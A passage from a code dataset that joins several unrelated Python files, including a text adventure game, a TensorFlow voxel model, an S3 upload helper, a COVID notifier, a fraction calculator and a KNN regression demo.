\"run\":\n\t\t\t\tchoice7 = input(\"The forest or the mountains: \")\n\t\t\n\n\t\t\t\tif choice7 == \"The Forest\" or choice7 == \"The forest\" or choice7 == \"Forest\" or choice7 == \"forest\":\n\t\t\t\t\tps(\"You lose the creatures in the forest and they go back to where they were.\")\n\t\t\t\t\tps(\"You got lucky that they arn't that smart or you wouldn't have gotten away\")\n\t\t\t\t\tps(\"You now go back to the open field \")\n\t\t\t\t\tR3()\n\n\n\t\t\t\telif choice7 == \"Mountains\" or choice7 == \"Mountain\" or choice7 == \"mountains\" or choice7 == \"mountain\" or choice7 == \"The Mountains\" or choice7 == \"The Mountain\" or choice7 == \"The mountains\" or choice7 == \"The mountain\" or choice7 == \"the Mountains\" or choice7 == \"the Mountain\" or choice7 == \"the mountains\" or choice7 == \"the mountain\":\n\t\t\t\t\tps(\"You run out of places to run and the creatures catch up with you and kill you.\")\n\t\t\t\t\tstart = 0\n\n\n\t\telif choice5 == \"leave\" or choice5 == \"Leave\":\n\t\t\tchoice7 == input(\"Where do you go.(Forest or Mountains): \")\n\t\t\n\n\t\t\tif choice7 == \"forest\" or choice7 == \"Forest\":\n\t\t\t\tlocation = \"forest\"\n\t\t\n\n\t\t\telif choice7 == \"Mountains\" or choice7 == \"Mountain\" or choice7 == \"mountains\" or choice7 == \"mountain\":\n\t\t\t\tlocation == \"spawn\"\n\t\n\n\telif pick5 == 1 and pick3 == 1:\n\t\tps(\"You think that you should probably go to the castle now\")\n\t\tchoice9 = input(\"Do you go to the castle or to another place (Castle, Forest, Mountains): \")\n\t\t\n\n\t\tif choice9 == \"Castle\" or choice9 == \"castle\":\n\t\t\tlocation = \"castleout\"\n\n\n\t\telif choice9 == \"Forest\" or choice9 == \"forest\":\n\t\t\tlocation = \"forest\"\n\n\n\t\telif choice9 == \"Mountains\" or choice9 == \"Mountain\" or choice9 == \"mountains\" or choice9 == \"mountain\":\n\t\t\tlocation = \"spawn\"\n\n\n\telif pick5 == 1 and pick3 == 0:\n\t\tps(\"You think that you should probably get a better view of the landscape by headding into the forest\")\n\t\tchoice9 = input(\"Do you go to the forest or the mountains (Forest, Mountains): \")\n\t\t\n\n\t\tif choice9 == \"Forest\" or choice9 == \"forest\":\n\t\t\tlocation = \"forest\"\n\n\n\t\telif choice9 == \"Mountains\" or choice9 == \"Mountain\" or choice9 == \"mountains\" or choice9 == \"mountain\":\n\t\t\tlocation = \"spawn\"\n\n\n\tif variable == 1 and pick3 == 1:\n\t\tps(\"You think that you should probably go to the castle now\")\n\t\tchoice9 = input(\"Do you go to the castle or to another place (Castle, Forest, Mountains): \")\n\t\t\n\n\t\tif choice9 == \"Castle\" or choice9 == \"castle\":\n\t\t\tlocation = \"castleout\"\n\n\n\t\telif choice9 == \"Forest\" or choice9 == \"forest\":\n\t\t\tlocation = \"forest\"\n\n\n\t\telif choice9 == \"Mountains\" or choice9 == \"Mountain\" or choice9 == \"mountains\" or choice9 == \"mountain\":\n\t\t\tlocation = \"spawn\"\n\n\n\telif variable == 1 and pick3 == 0:\n\t\tps(\"You think that you should probably get a better view of the landscape by headding into the forest\")\n\t\tchoice9 = input(\"Do you go to the forest or the mountains (Forest, Mountains): \")\n\t\t\n\n\t\tif choice9 == \"Forest\" or choice9 == \"forest\":\n\t\t\tlocation = \"forest\"\n\n\n\t\telif choice9 == \"Mountains\" or choice9 == \"Mountain\" or choice9 == \"mountains\" or choice9 == \"mountain\":\n\t\t\tlocation = \"spawn\"\n\n\n\n\ndef R4(): # Location 4, outside the castle\n\tglobal location\n\tps(\"You see a huge castle that has only one way to get to the doors\")\n\tps(\"There is a bridge to get to the doors but the bridge has really powerful defences\")\n\t\n\n\tif power == 1:\n\t\tps(\"You use the power you gained to create a bow and arrows.\")\n\t\tps(\"Using the bow and arrows you slowly disarm the defences until you reach the entrance to the castle.\")\n\t\tchoice10 = input(\"Do you wish to enter the castle? (Y/N): \")\n\t\t\n\n\t\tif choice10 == \"Y\" or choice10 == \"y\":\n\t\t\tlocation = \"boss\"\n\t\t\n\n\t\telif choice10 == \"N\" or choice10 == \"n\":\n\t\t\tchoice11 == input(\"Where do you want to go? (Forest or Open field): \")\n\t\t\n\n\t\t\tif choice11 == \"Forest\" or choice11 == \"forest\":\n\t\t\t\tlocation = \"forest\"\n\t\n\n\t\t\telif choice11 == \"open field\" or choice11 == \"Open Field\" or choice11 == \"open Field\" or choice11 == \"Open field\" or choice11 == \"field\" or choice11 == \"Field\":\n\t\t\t\tlocation = \"plains\"\n\t\n\n\telif power == 0:\n\t\tps(\"Seems like you need a ranged weapon to get past this bridge and your spear isnt enough to destroy the defences\")\n\t\tps(\"Where do you go now?\")\n\t\tchoice8 = input(\"Forest or Open field\")\n\n\n\t\tif choice8 == \"Forest\" or choice8 == \"forest\":\n\t\t\tlocation = \"forest\"\n\t\n\n\t\telif choice8 == \"open field\" or choice8 == \"Open Field\" or choice8 == \"open Field\" or choice8 == \"Open field\" or choice8 == \"field\" or choice8 == \"Field\":\n\t\t\tlocation = \"plains\"\n\n\n\n\ndef R5(): # Location 5, Boss room\n\tps(\"You enter the castle and you hear the voice again and it says, 'This is the boss room'.\")\n\tps(\"You see a huge open space with the boss on the other end of the room waiting for you\")\n\tps(\"The boss asks you 'Are you ready to fight me?'\")\n\tchoice13 = input(\"What is your answer to the boss's question? (Y/N)\")\n\n\n\tif (choice13 == \"y\" or choice13 == \"Y\") and pick3 == 0:\n\t\tps(\"You attack the boss, and after a long and hard fought fight, you beat the boss but at a cost.\")\n\t\tps(\"You lost one of your arms and you are mortally wounded\")\n\t\tps(\"Unluckily you have no way to heal yourself so you perish from internal dammage and bloodloss.\")\n\t\tstart = 0\n\n\n\telif (choice13 == \"y\" or choice13 == \"Y\") and pick3 == 1:\n\t\tps(\"You attack the boss, and after a long and hard fought fight, you beat the boss but at a cost.\")\n\t\tps(\"You lost one of your arms and you are mortally wounded\")\n\t\tps(\"Then you remember that you have the medicinal fruit that can heal you.\")\n\t\tps(\"You eat one, you have 2 left, it completely heals you and even regrows your arm.\")\n\t\tps(\"Suddenly a portal appears near the entrance and the voice says 'You have cleared this floor, take this portal to the next floor when you are ready'\")\n\t\tchoice12 = input(\"Go through the portal or stay until you are ready?(Stay or Leave): \")\n\n\n\t\tif choice12 == \"stay\" or choice12 == \"Stay\" or choice12 == \"leave\" or choice12 == \"Leave\":\n\t\t\tps(\"This is the end of part 1, stay tuned for the release of part 2\")\n\t\t\tps(\"Thankyou for playing Discontinuity!\")\n\t\t\tsys.exit()\n\n\n\telif choice13 == \"n\" or choice13 == \"N\":\n\t\tps(\"You answer the boss that you are not ready to fight him yet.\")\n\t\tps(\"The boss says 'Come back when you are ready'.\")\n\t\tps(\"You leave the castle and cross the bridge and it seems that the defences are active again.\")\n\t\tchoice14 == input(\"Where do you want to go? (Forest or Open field): \")\n\t\n\n\t\tif choice14 == \"Forest\" or choice14 == \"forest\":\n\t\t\tlocation = \"forest\"\n\t\n\n\t\telif choice14 == \"open field\" or choice14 == \"Open Field\" or choice14 == \"open Field\" or choice14 == \"Open field\" or choice14 == \"field\" or choice14 == \"Field\":\n\t\t\tlocation = \"plains\"\n\n\n\n# Code starts here\nwhile play:\n\tintro()\n\n\twhile start == \"\":\n\t\tif location == \"spawn\":\n\t\t\tR1()\n\t\telif location == \"forest\":\n\t\t\tR2()\n\t\telif location == \"plains\":\n\t\t\tR3()\n\t\telif location == \"castleout\":\n\t\t\tR4()\n\t\telif location == \"boss\":\n\t\t\tR5()\n\t\tif time1 <= 0:\n\t\t\tps(\"You hear the voice again and it says 'Time is up, the shadow soldiers have been released'.\")\n\t\t\tps(\"Immidiately you see many shadow creatures surround you and they can manipulate their bodies like whips.\")\n\t\t\tps(\"They attack you and eveytime they hit you, it gives you a really bad burn.\")\n\t\t\tps(\"You slowly die of excruciating pain, it feels like getting burned alive.\")\n\t\t\tstart = 0\n\t\ttime1 -= 1\n\trestart = input(\"Do you wish to try again? (Y/N): \")\n\tif restart == \"Y\" or restart == \"y\" or restart == \"\": #resets all variables\n\t\tstart = 0\n\t\tlocation = \"spawn\"\n\t\tpick2 = 0\n\t\tpick3 = 0\n\t\tpick4 = 0\n\t\tpick5 = 0\n\t\ttime1 = 10\n\t\tchoice1 = 0\n\t\tchoice2 = 0\n\t\tchoice3 = 0\n\t\tchoice4 = 0\n\t\tchoice5 = 0\n\t\tchoice6 = 0\n\t\tchoice7 = 0\n\t\tchoice6 = 0\n\t\tchoice9 = 0\n\t\tchoice10 = 0\n\t\tchoice11 = 0\n\t\tchoice12 = 0\n\t\tchoice13 = 0\n\t\tchoice14 = 0\n\t\ts1 = 0\n\t\tpower = 0\n\n\telse:\n\t\tps(\"Thankyou for playing Discontinuity!\")\n\t\tsys.exit()","sub_path":"Discontinuity.py","file_name":"Discontinuity.py","file_ext":"py","file_size_in_byte":15750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"511695016","text":"import struct\ndef main():\n file=open('binFile','wb')\n s1='王涛'.encode('utf-8')\n s2='机械11'.encode('utf-8')\n print(len(s1))\n print(type(s1))\n print(s1,s2)\n byte=struct.pack('!6s8si',s1,s2,128)\n print(byte)\n file.write(byte)\n file.close()\n\n file=open('binFile','rb')\n a,b,c=struct.unpack('!6s8si',file.read(18))\n file.close()\n print(a.decode('utf-8'),b.decode('utf-8'),c)\n \nmain() #执行主函数\n","sub_path":"python学习示例/字节序列实例.py","file_name":"字节序列实例.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"310222672","text":"#!/usr/bin/env python\n# -*- coding:UTF-8 -*-\n\nimport sys\nimport os\nimport tensorflow as tf\n\nfrom config import cfg\nfrom utils import *\n\nfrom model.vfe_layer import FeatureNet\nfrom model.conv_middle import MiddleConv\nfrom model.grouping import SoftmaxGroup\n\nclass VoxelGridMatch(object):\n\n def __init__(self, group_num, single_batch_size=2, learning_rate=0.001, max_gradient_norm=5.0, avail_gpus=['0']):\n\n # Tune some hyperparameters\n self.single_batch_size = single_batch_size\n self.learning_rate = tf.Variable(float(learning_rate), trainable=False, dtype=tf.float32)\n self.global_step = tf.Variable(1, trainable = False)\n self.epoch = tf.Variable(0, trainable=False)\n self.epoch_add_op = self.epoch.assign(self.epoch + 1)\n self.avail_gpus = avail_gpus\n self.group_num = group_num\n # Piecewise constant learning rate\n boundaries = [80, 120]\n values = [ self.learning_rate, self.learning_rate * 0.1, self.learning_rate * 0.01 ]\n lr = tf.train.piecewise_constant(self.epoch, boundaries, values)\n\n # build graph\n self.is_train = tf.placeholder(tf.bool, name='phase')\n\n # Fill in more missing\n self.vox_feature = []\n self.vox_number = []\n self.vox_coordinate = []\n self.label = []\n self.descriptor_output = []\n self.prob_output = []\n self.opt = tf.train.GradientDescentOptimizer(lr)\n # Do I need this?\n self.gradient_norm = []\n self.tower_grads = []\n with tf.variable_scope(tf.get_variable_scope()):\n for idx, dev in enumerate(self.avail_gpus):\n with tf.device('/gpu:{}'.format(dev)), tf.name_scope(('gpu_{}').format(dev)):\n\n # Network structure\n feature = FeatureNet(training=self.is_train, batch_size=self.single_batch_size)\n middle = MiddleConv(input=feature.outputs, training=self.is_train)\n grouping = SoftmaxGroup(input=middle.outputs, num_of_groups = self.group_num, batch_size=self.single_batch_size)\n tf.get_variable_scope().reuse_variables()\n\n # input\n self.vox_feature.append(feature.feature)\n self.vox_number.append(feature.number)\n self.vox_coordinate.append(feature.coordinate)\n self.label.append(grouping.label) # How is this accessed?\n\n # output\n feature_output = feature.outputs\n descriptor_output = middle.outputs\n prob_output = grouping.prob_output\n\n # loss and grad what is this for\n if idx == 0:\n self.extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\n # Apparently this is gradient clipping\n self.loss = grouping.loss\n \n self.params = tf.trainable_variables()\n gradients = tf.gradients(self.loss, self.params)\n clipped_gradients, gradient_norm = tf.clip_by_global_norm(\n gradients, max_gradient_norm)\n\n # I guess to save them?\n self.prob_output.append(prob_output)\n self.gradient_norm.append(gradient_norm)\n self.tower_grads.append(clipped_gradients)\n self.descriptor_output.append(descriptor_output)\n\n self.vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)\n\n # loss and optimizer, with clipping\n with tf.device('/gpu:{}'.format(self.avail_gpus[0])):\n self.grads = average_gradients(self.tower_grads)\n self.update = [self.opt.apply_gradients(\n zip(self.grads, self.params), global_step=self.global_step)]\n self.gradient_norm = tf.group(*self.gradient_norm)\n\n # what is this update thing\n self.update.extend(self.extra_update_ops)\n self.update = tf.group(*self.update)\n\n # some output thingy\n # Batchsize x 32\n self.descriptor_output = tf.concat(self.descriptor_output, axis=0)\n # Batchsize x Groupsize\n self.prob_output = tf.concat(self.prob_output, axis=0)\n # Batchsize x 1\n self.group_output = tf.argmax(self.prob_output, axis=1)\n\n\n # Saver\n self.saver = tf.train.Saver(write_version=tf.train.SaverDef.V2, max_to_keep=10, pad_step_number=True, keep_checkpoint_every_n_hours=1.0)\n\n self.train_summary = tf.summary.merge([\n tf.summary.scalar('train/loss', self.loss),\n *[tf.summary.histogram(each.name, each) for each in self.vars + self.params]])\n\n # Include the 32-descriptor and prediction\n self.validate_summary = tf.summary.merge([\n tf.summary.scalar('validate/loss', self.loss),\n *[tf.summary.histogram('validate/descriptor_'+str(i), tf.gather(self.descriptor_output, i))\n for i in range(self.single_batch_size*len(self.avail_gpus))]\n ])\n\n self.predict_summary = tf.summary.merge([\n tf.summary.tensor_summary('predict/group',self.group_output,\n summary_description='Predicted group of every pointcloud in batch')\n ])\n\n def train_step(self, session, data, train=False, summary=False):\n # input\n # N x Groups label\n # vox_feature\n # vox_number\n # vox_coordinate\n label = data[0]\n vox_feature = data[1]\n vox_number = data[2]\n vox_coordinate = data[3]\n print('training step')\n\n input_feed = {}\n input_feed[self.is_train] = True\n for idx in range(len(self.avail_gpus)):\n input_feed[self.vox_feature[idx]] = vox_feature[idx]\n input_feed[self.vox_number[idx]] = vox_number[idx]\n input_feed[self.vox_coordinate[idx]] = vox_coordinate[idx]\n input_feed[self.label[idx]] = label[idx]\n\n if train:\n output_feed = [self.loss,self.gradient_norm, self.prob_output, self.update]\n else:\n output_feed = [self.loss, self.prob_output]\n\n if summary:\n output_feed.append(self.train_summary)\n # TODO: multi-gpu support for test and predict step\n return session.run(output_feed, input_feed)\n\n def validate_step(self, session, data, summary=False):\n # input\n # N label\n # vox_feature\n # vox_number\n # vox_coordinate\n label = data[0]\n vox_feature = data[1]\n vox_number = data[2]\n vox_coordinate = data[3]\n print('validation runs')\n\n input_feed = {}\n input_feed[self.is_train] = False\n\n for idx in range(len(self.avail_gpus)):\n input_feed[self.vox_feature[idx]] = vox_feature[idx]\n input_feed[self.vox_number[idx]] = vox_number[idx]\n input_feed[self.vox_coordinate[idx]] = vox_coordinate[idx]\n input_feed[self.label[idx]] = label[idx]\n\n output_feed = [self.loss, self.prob_output]\n\n if summary:\n output_feed.append(self.validate_summary)\n return session.run(output_feed, input_feed)\n\n def predict_step(self, session, data, summary=False):\n # input\n # N label\n # vox_feature\n # vox_number\n # vox_coordinate\n label = data[0]\n vox_feature = data[1]\n vox_number = data[2]\n vox_coordinate = data[3]\n print('prediction runs')\n\n input_feed = {}\n input_feed[self.is_train] = False\n for idx in range(len(self.avail_gpus)):\n input_feed[self.vox_feature[idx]] = vox_feature[idx]\n input_feed[self.vox_number[idx]] = vox_number[idx]\n input_feed[self.vox_coordinate[idx]] = vox_coordinate[idx]\n\n output_feed = [self.prob_output, self.descriptor_output]\n [logits, descriptor] = session.run(output_feed, input_feed)\n if summary: \n ret_summary = session.run(self.predict_summary,{\n self.descriptor_output: descriptor,\n self.prob_output: logits})\n\n return [ret_summary]\n \n return [tf.nn.softmax(self.prob_output)]\n \n\n # ref:\n # https://github.com/tensorflow/models/blob/6db9f0282e2ab12795628de6200670892a8ad6ba/tutorials/image/cifar10/cifar10_multi_gpu_train.py#L103\n # Averaging gradients from the clipped ones I guess?\ndef average_gradients(tower_grads):\n\n average_grads = []\n for grad_and_vars in zip(*tower_grads):\n grads = []\n for g in grad_and_vars:\n # Add 0 dimension to the gradients to represent the tower.\n expanded_g = tf.expand_dims(g, 0)\n\n # Append on a 'tower' dimension which we will average over below.\n grads.append(expanded_g)\n\n # Average over the 'tower' dimension.\n grad = tf.concat(axis=0, values=grads)\n grad = tf.reduce_mean(grad, 0)\n\n # Keep in mind that the Variables are redundant because they are shared\n # across towers. So .. we will just return the first tower's pointer to\n # the Variable.\n grad_and_var = grad\n average_grads.append(grad_and_var)\n return average_grads\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"model/tf_model.py","file_name":"tf_model.py","file_ext":"py","file_size_in_byte":9369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"208835644","text":"import torch\nfrom typing import *\nfrom torch import nn, Tensor\nfrom object_detection.models.centernet import CenterNet, NetOutput, Head\nfrom object_detection.models.backbones.effnet import (\n EfficientNetBackbone,\n)\nfrom object_detection.models.modules import (\n MaxPool2dStaticSamePadding,\n SeparableConvBR2d,\n MemoryEfficientSwish,\n)\nfrom object_detection.entities import ImageBatch\nfrom fish import config\n\n\nclass FilterCenterNet(nn.Module):\n def __init__(\n self,\n channels: int,\n box_depth: int = 1,\n cls_depth: int = 1,\n fpn_depth: int = 1,\n out_idx: int = 4,\n backbone_id: int = 3,\n num_classes: int = config.num_classes,\n ) -> None:\n super().__init__()\n self.num_classes = num_classes\n backbone = EfficientNetBackbone(3, out_channels=channels, pretrained=True)\n self.net = CenterNet(\n channels=channels,\n num_classes=num_classes,\n backbone=backbone,\n box_depth=box_depth,\n cls_depth=cls_depth,\n fpn_depth=fpn_depth,\n out_idx=out_idx,\n )\n self.filter_head = nn.Sequential(\n SeparableConvBR2d(in_channels=channels),\n MemoryEfficientSwish(),\n MaxPool2dStaticSamePadding(3, 2),\n SeparableConvBR2d(in_channels=channels, out_channels=channels * 2),\n MemoryEfficientSwish(),\n MaxPool2dStaticSamePadding(3, 2),\n SeparableConvBR2d(in_channels=channels * 2, out_channels=num_classes),\n nn.AdaptiveMaxPool2d(1),\n nn.Sigmoid(),\n )\n\n def __call__(self, x: ImageBatch) -> Tuple[NetOutput, Tensor]:\n (heat_maps, box_maps, anchor), fpn = self.net(x)\n fh = self.filter_head(fpn[-1])\n heat_maps = fh * heat_maps\n return (heat_maps, box_maps, anchor), fh.view(-1, self.num_classes)\n","sub_path":"fish/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"653479599","text":"#!/usr/bin/python3\nimport os\n\ndef consolida(files, pos_index, pos_value, delimiter=' ', date=False):\n d_values = dict()\n \n for file in files:\n print ('file', file)\n with open(file, 'r') as f:\n content = [line.rstrip().split(delimiter) for line in f]\n \n # remove headers; [running process id] and [header itself]\n del content[0]\n del content[0]\n \n #print('[P0]', content)\n for row in content:\n idx = int(row[pos_index])\n #print ('idx', idx)\n if not date:\n val = float(row[pos_value])\n else:\n date_value = str(row[pos_value])\n while len(date_value) < 8:\n date_value = '00:' + date_value\n h, m, s = date_value.split(':')\n val = int(h) * 3600 + int(m) * 60 + int(s) * 1\n \n if idx in d_values:\n d_values[idx].append(val)\n else:\n d_values[idx] = [val]\n #print('[P1]', d_values)\n \n for k in d_values.keys():\n idx_vsize = len(d_values[k])\n #print('[P2]', idx_vsize)\n d_values[k] = sum(d_values[k]) / idx_vsize\n #print('[P3]', d_values[k])\n \n return d_values\n \ndef agrega(d1, d2):\n for (k, v) in d2.items():\n if k in d1:\n d1[k].append(d2[k])\n else:\n d1[k] = [d2[k]]\n \ndef lista_arquivos(root_dir, files_extension):\n for directory, subdirectory, files in os.walk(root_dir):\n for file in files:\n if file.endswith(files_extension):\n #print(os.path.join(directory, file))\n yield str(os.path.join(directory, file))\n \ndef nice_print(headers, data):\n full_table = ','.join(headers) + '\\n'\n \n for (k, v) in data.items():\n syscr, syscw, br, bw, mem, cpu, cpu_time, etimes = v\n table = '%d, ' % k\n table += '%d, ' % syscr\n table += '%d, ' % syscw\n table += '%d, ' % br\n table += '%d, ' % bw\n table += '%1.4f, ' % mem\n table += '%1.2f, ' % cpu\n table += '%d, ' % cpu_time\n table += '%d' % etimes\n print(table)\n full_table += table + '\\n'\n \n return full_table\n\nif __name__ == \"__main__\":\n arquivos = []\n for arquivo in lista_arquivos('.', '.txt'):\n arquivos.append(arquivo)\n \n ## execution time, syscr, syscw, read_bytes, write_bytes, resident memory, %cpu, cpu total time, elapsed time, number of threads, process id, arguments\n headers = 'execution time, syscr, syscw, read_bytes, write_bytes, resident memory, %cpu, cpu total time, elapsed time'.split(',')\n \n syscr = consolida(arquivos, 0, 1)\n syscw = consolida(arquivos, 0, 2)\n br = consolida(arquivos, 0, 3)\n bw = consolida(arquivos, 0, 4)\n mem = consolida(arquivos, 0, 5)\n cpu = consolida(arquivos, 0, 6)\n cpu_time = consolida(arquivos, 0, 7, date=True)\n elapsed_time = consolida(arquivos, 0, 8, date=True)\n #threads = consolida(arquivos, 0, 9)\n \n d_dados = dict()\n agrega(d_dados, syscr)\n agrega(d_dados, syscw)\n agrega(d_dados, br)\n agrega(d_dados, bw)\n agrega(d_dados, mem)\n agrega(d_dados, cpu)\n agrega(d_dados, cpu_time)\n agrega(d_dados, elapsed_time)\n #agrega(d_dados, threads)\n print(d_dados)\n \n table = nice_print(headers, d_dados)\n with open('consolidado.log', 'w') as f:\n f.write(table)\n\n","sub_path":"dados/logs/consolida.py","file_name":"consolida.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"620090523","text":"#CORONA update notifier......\r\nfrom plyer import notification #pip install plyer\r\nfrom covid import Covid #pip install covid\r\nimport time\r\nimport pyttsx3 #pip install pyttsx3\r\n\r\n\r\nvoice=pyttsx3.init('sapi5') #sound API(application program interface)\r\nvoice_list=voice.getProperty('voices')\r\nvoice.setProperty('voices',voice_list[0].id)\r\n\r\n\r\ndef speak(text):\r\n voice.say(text)\r\n voice.runAndWait()\r\n \r\ndef notifyme(title,message):\r\n notification.notify(\r\n title = title,\r\n message = message,\r\n app_icon = None,\r\n timeout=30)\r\n\r\ndef getdata(x):\r\n covid=Covid()\r\n cases=covid.get_status_by_country_name(x)\r\n for x in cases:\r\n print(x,\":\",cases[x])\r\n return f\"confirmed cases are : {cases.get('confirmed')} \\n active cases are : {cases.get('active')} \\n deaths are : {cases.get('deaths')}\"\r\n\r\nif __name__==\"__main__\":\r\n x='india'\r\n notifyme(\"COVID CASES LATEST UPDATE...!!!!\",getdata(x))\r\n speak(\"COVID CASES LATEST UPDATE....!!!!\")\r\n speak(f\"time now is{time.ctime()}\")\r\n speak(getdata(x))\r\n print(time.ctime())\r\n","sub_path":"python project.py","file_name":"python project.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"493456839","text":"# Amazon S3 handling\nimport boto3\nimport logging\n\nlogging.basicConfig(filename='log_weather.log', level=logging.INFO, format='%(asctime)s %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')\n\nclass AWS_S3:\n def __init__(self, bucket_name, image_filename = \"image.jpg\", telemetry_filename = \"weatherdata.txt\"):\n # Return an object and sets the bucket name\n self.s3 = boto3.resource('s3')\n self.bucket_name = bucket_name\n self.telemetry_filename = telemetry_filename\n self.image_filename = image_filename\n\n#upload the telemetry file to the S3 Bucket\n def uploadTelemetry(self):\n try:\n logging.info('Uploading telemetry...')\n self.s3.meta.client.upload_file(self.telemetry_filename, self.bucket_name, self.telemetry_filename, ExtraArgs={ \"ContentType\": \"text/plain\", 'ACL': 'public-read'})\n return True\n except Exception as e:\n logging.critical(str(e) + ' Failed uploading telemetry file to S3')\n return False\n \n #upload the compressed image to the S3 Bucket\n def uploadImage(self):\n try:\n logging.info('Uploading an image to S3..')\n self.s3.meta.client.upload_file(self.image_filename, self.bucket_name, self.image_filename, ExtraArgs={ \"ContentType\": \"image/jpg\", 'ACL': 'public-read'})\n return True\n except Exception as e:\n logging.critical(str(e) + ' Failed uploading an image to S3')\n return False\n ","sub_path":"HandlerS3.py","file_name":"HandlerS3.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"337076978","text":"from fractions import Fraction\ntry:\n\tdef fracToMixed(num,dem):\n\t\t\n\t\ta = num // dem\n\t\tb = num % dem\n\t\t#print(a)\n\t\tprint(\"{} {}/{}\".format(a, b, dem))\n\t\tprint()\n\t\tmain()\n\t\n\tdef gcd(a, b):\n\t if (a == 0):\n\t return b;\n\t return gcd(b % a, a);\n\n\tdef lowest(den3, num3):\n\n\t common_factor = gcd(num3, den3);\n\n\t den3 = int(den3 / common_factor);\n\t num3 = int(num3 / common_factor);\n\t #print(num3, \"/\", den3);\n\t fracToMixed(num3,den3)\n\n\tdef addFraction(num1, den1, num2, den2):\n\n\t den3 = gcd(den1, den2);\n\n\t den3 = (den1 * den2) / den3;\n\n\t num3 = ((num1) * (den3 / den1) -\n\t (num2) * (den3 / den2));\n\n\t lowest(den3, num3);\n\n\tdef main():\n\t\tloop = True\n\t\twhile loop == True:\n\t\t\theltal1 = int(input(\"heltal1 = \"))#2\n\t\t\ttæller1 = int(input(\"tæller1 = \"))#2\n\t\t\tnævner1 = int(input(\"nævner1 = \"))#3\n\n\t\t\theltal2 = int(input(\"heltal2 = \"))#3\n\t\t\ttæller2 = int(input(\"tæller2 = \"))#1\n\t\t\tnævner2 = int(input(\"nævner2 = \"))#2\n\n\n\t\t\tbrøkTop1 = heltal1 * nævner1 + tæller1\n\t\t\tbrøkBot1 = nævner1\n\t\t\t\n\t\t\tbrøkTop2 = heltal2 * nævner2 + tæller2\n\t\t\tbrøkBot2 = nævner2\n\t\t\t#print(f\"{brøkTop1} / {brøkBot1}\")\n\t\t\t#print(f\"{brøkTop2} / {brøkBot2}\\n\")\n\t\t\taddFraction(brøkTop1, brøkBot1, brøkTop2, brøkBot2)\n\n\t\t\t#loop = False\n\tmain()\nexcept KeyboardInterrupt:\n\tprint(\"goodbye\") \n","sub_path":"blandedeTal/blandede_tal_Brøker_minus.py","file_name":"blandede_tal_Brøker_minus.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"419019936","text":"import mglearn\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mglearn.datasets import make_wave\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsRegressor #리그레서 사용\n\nclass GreenStar(object):\n \n x, y = make_wave(n_samples=40) # mglearn의 데이터셋 중 make_wave 에서 가져오는 샘플의 수이다.\n x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=0, test_size=0.3)\n\n def __init__(self):\n self._neighbors = 0 # 가장 가까운 이웃의 갯수이다. 예제에서는 3을 사용한다.\n self._jobs = 0 # 사용할 코어의 수이다. -1 이면 모든 코어 사용한다.\n\n @property\n def neighbors(self) -> 0:\n return self._neighbors\n\n @neighbors.setter\n def neighbors(self, neighbors):\n self._neighbors = neighbors\n\n @property\n def jobs(self) -> 0:\n return self._jobs\n\n @jobs.setter\n def jobs(self, jobs):\n self._jobs = jobs\n\n def get_knn_reg_score(self):\n knn_reg = KNeighborsRegressor(n_neighbors=self.neighbors, n_jobs=self.jobs) # 3, -1\n knn_reg.fit(self.x_train, self.y_train)\n return knn_reg.score(self.x_test, self.y_test)\n\n def plot_knn_reg(self):\n _, axes = plt.subplots(1, 3) # 언더바 쉼표 입니다\n xtrain = self.x_train\n xtest = self.x_test\n ytrain = self.y_train\n ytest = self.y_test\n line = np.linspace(-5, 5, num=1000)\n line = line.reshape(-1, 1)\n for i, ax in zip([1, 3, 9], axes.ravel()):\n knn_reg = KNeighborsRegressor(n_neighbors=i, n_jobs=-1)\n knn_reg.fit(xtrain, ytrain)\n prediction = knn_reg.predict(line)\n ax.plot(line, prediction, label='model predict', c='k')\n ax.scatter(xtrain, ytrain, marker='^', c='darkred', label='train target')\n ax.scatter(xtest, ytest, marker='v', c='darkblue', label='test target')\n train_score = knn_reg.score(xtrain, ytrain)\n test_score = knn_reg.score(xtest, ytest)\n ax.set_title('k={}\\n test score={:.3f}\\n train score={:.3f}'.format(i, train_score, test_score))\n ax.set_xlabel('feature')\n ax.set_ylabel('target')\n axes[0].legend(loc=2)\n plt.show()\n\n @staticmethod\n def main():\n knn = GreenStar()\n while 1:\n menu = input('0.Exit\\n 1.Plot\\n 2.Score\\n')\n if menu == '0':\n break\n elif menu == '1':\n knn.neighbors = int(input('Please Enter a Neighbors Value.'))\n mglearn.plots.plot_knn_regression(n_neighbors=knn.neighbors)\n plt.show()\n elif menu == '2':\n knn.neighbors = int(input('Please Enter a Neighbors Value.'))\n knn.jobs = int(input('Please Enter a Jobs Value.'))\n score = knn.get_knn_reg_score()\n print(\"{:.3f}\".format(score)) # 0.697\n elif menu == '3':\n knn.plot_knn_reg()\n else:\n print('Wrong Number. Enter Another Number')\n\n\nGreenStar.main()","sub_path":"step6_knn/green_star.py","file_name":"green_star.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"400790248","text":"#-*-coding:utf8;-*-\nimport time\nimport os\n\nfrom math import sin, cos, radians\ng = 9.8 #I am defining the value of g so use it when using the Big 3 